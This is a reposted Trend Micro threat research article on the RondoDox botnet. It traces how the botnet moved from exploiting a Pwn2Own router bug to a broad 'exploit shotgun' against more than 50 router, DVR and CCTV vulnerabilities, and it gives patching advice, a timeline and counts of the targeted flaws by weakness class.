PostHole
Compose Login
You are browsing eu.zone1 in read-only mode. Log in to participate.
rss-bridge 2025-10-09T00:00:00+00:00

RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits

Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.

Cyber Threats

RondoDox: From Targeting Pwn2Own Vulnerabilities to Shotgunning Exploits

Trend™ Research and ZDI Threat Hunters have identified a large-scale RondoDox botnet campaign exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first seen in Pwn2Own contests.

By: Deep Patel, Ashish Verma, Simon Dulude, Peter Girnus

Oct 09, 2025

Read time: ( words)

Save to Folio

Key takeaways

  • The campaign exposes organizations to the risks of data exfiltration, persistent network compromise, and operational disruption for organizations with exposed infrastructure.
  • Organizations operating internet-facing network devices are at heightened risk. Active exploitation has been observed globally since mid-2025, with several CVEs now included in CISA’s Known Exploited Vulnerabilities (KEV) catalog.
  • Prioritize patching of all listed vulnerabilities, especially those in the KEV catalog. Conduct regular vulnerability assessments, segment networks to limit lateral movement, and continuously monitor devices for anomalous activities. Trend Micro solutions already provide protection against vulnerabilities and flaws exploited in this campaign, helping organizations mitigate exposure while patching efforts are underway.

The Trend Zero Day Initiative™ (ZDI) Threat Hunting and Trend™ Research teams have identified a significant RondoDox botnet campaign that targets a wide range of internet-exposed infrastructure. This campaign consists of over 50 exploits, including unpatched router flaws across over 30 vendors, targeting vulnerabilities found in routers, digital video recorders (DVRs), network video recorders (NVRs), CCTV systems, web servers, and various other network devices. While the exploits specifically exploit vulnerabilities in routers, DVRs, NVRs, CCTV systems, web servers, and networking equipment, the latest RondoDox campaign uses an "exploit shotgun", using multiple exploits and seeing what hits.

From Pwn2Own to active in-the-wild exploitation

Our first RondoDox intrusion attempt began on June 15, 2025, when we identified a familiar vulnerability from our Pwn2Own Toronto event. This vulnerability, tracked as CVE-2023-1389, targets the WAN interface of the TP-Link Archer AX21 Wi-Fi router.

We previously reported on a Mirai campaign that exploited CVE-2023-1389 back in 2023, shortly after the Pwn2Own event. Vulnerabilities presented at our Pwn2Own consumer event continue to be popular with botnet operators.

[Figure 1. Pwn2Own Ireland target list in the SOHO Smashup event including multiple networking devices]

Figure 1. Pwn2Own Ireland target list in the SOHO Smashup event including multiple networking devices

download

Trend customers can be reassured that they have been protected against vulnerabilities like CVE-2023-1389 since it was disclosed at Pwn2Own.

[Figure 2. Tri Dang and Bien Pham (@bienpnn) from Qrious Secure were able to exploit two bugs (authentication bypass and command injection) at Pwn2Own Toronto 2022]

Figure 2. Tri Dang and Bien Pham (@bienpnn) from Qrious Secure were able to exploit two bugs (authentication bypass and command injection) at Pwn2Own Toronto 2022

download

RondoDox background: a new botnet emerges

RondoDox first surfaced publicly in mid-2025 as a stealthy botnet campaign that weaponizes longstanding command-injection flaws in internet-facing routers, DVRs, NVRs, CCTV systems, and other networking equipment to gain shell access and, ultimately, to drop multiarchitecture payloads. The initial RondoDox analysis authored by FortiGuard Labs highlighted an initial campaign, which focused on TBK DVRs and Four-Faith routers, through the exploitation of CVE-2024-3721 and CVE-2024-12856.

More recently, RondoDox broadened its distribution by using a “loader-as-a-service” infrastructure that co-packages RondoDox with Mirai/Morte payloads — making detection and remediation more urgent.

[Figure 3. A timeline of the RondoDox vulnerability, from initial disclosure and first detection in 2025 to eventual widespread exploitation in large-scale campaigns]

Figure 3. A timeline of the RondoDox vulnerability, from initial disclosure and first detection in 2025 to eventual widespread exploitation in large-scale campaigns

download

Below is the timeline showing key events in the RondoDox vulnerability, from discovery to exploitation:

  • December 6, 2022: Tri Dang and Bien Pham (@bienpnn) from Qrious Secure exploit the WAN interface of TP-Link AX1800 at Pwn2Own Toronto 2022.
  • January 15, 2023: Pwn2Own vulnerability is reported to TP-Link. Coordinated public disclosure of CVE-2023-1389 with vendor.
  • June 15, 2025: First RondoDox event detected inside Trend Telemetry utilizing Pwn2Own Toronto 2022 bug, CVE-2023-1389.
  • September 22, 2025: Trend Threat Research triages a RondoDox exploitation spike inside Trend telemetry.
  • September 25, 2025: CloudSEK publishes a follow-up showing rapid growth via a loader-as-a-service model that distributes RondoDox alongside Mirai/Morte, with evidence of large-scale, rotated infrastructure.

Exploit shotgun: RondoDox’s expanded arsenal

Building on CVE-2023-1389 and other vulnerabilities, such as CVE-2024-3721and CVE-2024-12856, RondoDox’s expanded arsenal now includes several additional CVEs and exploitation patterns observed in the wild. It’s a clear signal that the campaign is evolving beyond single-device opportunism into a multivector loader operation.

Notably, researchers tied the active exploitation of CVE-2024-3721 (TBK DVR) and CVE-2024-12856 (Four-Faith routers) to RondoDox activity, and a subset of the newly observed vulnerabilities was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog, elevating them to immediate, high-priority patching targets for defenders.

Below we list the fresh CVEs researchers have seen in RondoDox campaigns, summarizing how each is being weaponized:

RondoDox targeted vulnerabilities

  • Total Vulnerabilities: 56
  • No CVE Assigned: 18
  • CVE Assigned: 38
  • Command Injection (CWE-78): 50
  • Path Traversal (CWE-22): 2
  • Buffer Overflow (CWE-120): 1
  • Authentication Bypass (CWE-287): 1
  • Memory Corruption (CWE-119): 1

********************

[...]

Original source

Reply